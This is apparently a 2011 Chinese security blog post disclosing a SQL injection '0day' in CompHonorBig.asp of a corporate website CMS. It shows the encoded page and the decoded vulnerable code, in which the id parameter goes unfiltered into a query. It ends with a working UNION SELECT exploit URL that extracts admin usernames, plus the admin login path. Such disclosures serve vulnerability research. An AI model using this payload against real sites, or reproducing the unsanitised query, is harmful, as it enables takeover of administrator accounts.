新世纪企业建站系统 V12.7 注射 Oday,漏洞文件:CompHonorBig.asp。
|
首先看到了一段代码加密:
<%@ LANGUAGE = VBScript.Encode %>
<!--#include file="Inc/conn.asp"-->
<%#@~^JgAAAA==[b:~bN@#@&k9'Mn;!+dYcp;nMX?D.k o`rr[J*bgwAAA==^#~@%>
<html>
<head>
<title>图片</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<%#@~^cAAAAA==@#@&/nDPM/'k+M-+MR/DlOn}4L^YvJl9G[4cDmGD[dYE#@#@&DkRG2xPEdVnmD~CPWMWsPZK:auW W.PStn.Pk9xJLkNB^Gx ~8~q@#@&MyMAAA==^#~@%>
<%#@~^6gAAAA==r6POMks`Dk`r/WswuW W.E*#@!@*EJ,YtU@#@&iP,Dn/2G /nRS.kD+~E@!Nk-~mVro xEmn YDB@*@!bho,/.m{J'OMk:v./vJZKh2CKxKDE#b'rP8WM[+M'T~@*@!z[r7@*E@#@&n^/n@#@&iPPM+k2W /nRqDrOPJ@!r:TP/M^xksoJxGwr^cL2o,Ak9Y4x+*P4nbo4Y{1+PC^Y{暂时没有图片!@*J@#@&UN,kWu0IAAA==^#~@%>
<div align="center"><BR>
<%=#@~^EwAAAA==OMkhvDk`J6aslbxE#*eAYAAA==^#~@%><BR>
</div>
<%#@~^IgAAAA==@#@&Ddcm^W/@#@&d+DP./{xGO4kxT@#@&8wgAAA==^#~@%>
</body>
</html> |
于是很好奇,其他都不加密,为什么偏偏这文件加密呢~!再看了下其他代码,都加上了防注入代码,而这个貌似没有调用到那个防注入。于是乎,我就解密了,Oday 也随之而来。哈哈~!
|
解密后的代码:
<%@ LANGUAGE = VBScript %>
<!--#include file="Inc/conn.asp"-->
<%dim id
id=request.QueryString("id")%> //接收ID参数
<html>
<head>
<title>图片</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<%
set rs=server.CreateObject("adodb.recordset")
rs.open "select * from CompHonor where id="&id,conn,1,1
%> //带入查询
<%if trim(rs("CompHonor"))<>"" then
response.write "<div align='center'><img src="&trim(rs("CompHonor"))&" border=0 ></div>"
else
response.Write "<img src=img/nopic.jpg width=65 height=96 alt=暂时没有图片!>"
end if%>
<div align="center">
<%=trim(rs("explain"))%>
</div>
<%
rs.close
set rs=nothing
%>
</body>
</html> |
本人疑是作者留下的后门,呵呵~!不解释。
|
附上EXP:
管理账号:
http://127.0.0.1/CompHonorBig.asp?id=11 union select 1,username,3,4,5 from admin
后台地址:
http://127.0.0.1/admin/login.asp |
文章作者
Nuclear'Atk
上次更新
2011-01-12
许可协议
Nuclear'Atk(核攻击)网络安全实验室版权所有,转载请注明出处。